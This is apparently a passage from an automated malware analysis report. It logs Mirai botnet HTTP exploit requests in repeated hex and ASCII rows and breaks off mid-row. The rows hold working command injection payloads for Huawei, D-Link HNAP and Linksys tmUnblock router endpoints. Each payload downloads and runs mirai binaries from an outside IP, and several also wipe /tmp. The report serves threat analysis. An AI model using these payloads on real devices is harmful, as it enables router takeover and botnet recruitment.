6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 